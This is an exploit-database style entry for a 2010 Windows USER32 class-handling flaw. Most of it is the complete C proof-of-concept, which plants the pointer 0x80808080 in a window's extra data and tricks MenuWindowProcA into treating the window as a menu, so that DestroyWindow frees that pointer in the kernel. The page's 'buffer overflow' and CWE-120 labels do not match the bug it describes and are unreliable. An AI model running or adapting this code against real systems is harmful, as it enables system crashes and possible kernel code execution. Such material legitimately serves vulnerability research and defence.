Windows Class Handling Gone Wrong

vendor:

Windows

by:

Mista

9.3

CVSS

HIGH

Buffer Overflow

120 (Buffer Copy without Checking Size of Input)

CWE

Product Name: Windows

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2010

Windows Class Handling Gone Wrong

This exploit is based on a vulnerability in the Windows Class handling. The vulnerability is caused by a buffer overflow in the MenuWindowProcA function in the USER32.DLL library. The exploit sets the pointer value of the (soon to be) popup menu structure to 0x80808080 and then sets WND->fnid = FNID_MENU. This triggers the ExPoolFree(0x80808080) function, which can lead to a denial of service or arbitrary code execution.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all input is properly validated and sanitized before being used.

Source

Exploit-DB raw data:

#include <windows.h>

/*
Source:
http://mista.nu/blog/2010/12/01/windows-class-handling-gone-wrong/
*/

int main(int argc, char **argv)
{
	WNDCLASSA Class = {0};
	CREATESTRUCTA Cs = {0};
	FARPROC MenuWindowProcA;
	HMODULE hModule;
	HWND hWindow;

	Class.lpfnWndProc = DefWindowProc;
	Class.lpszClassName = "Class";
	Class.cbWndExtra = sizeof(PVOID);

	RegisterClassA(&Class);

	hModule = LoadLibraryA("USER32.DLL");

	MenuWindowProcA = GetProcAddress(hModule,"MenuWindowProcA");

	hWindow = CreateWindowA("Class","Window",0,0,0,32,32,NULL,NULL,NULL,NULL);

	// set the pointer value of the (soon to be) popup menu structure
	SetWindowLongPtr(hWindow,0,(LONG_PTR)0x80808080);

	// set WND->fnid = FNID_MENU
	MenuWindowProcA(hWindow,0,WM_NCCREATE,(WPARAM)0,(LPARAM)&Cs);

	// trigger -> ExPoolFree(0x80808080)
	DestroyWindow(hWindow);

	return 0;
}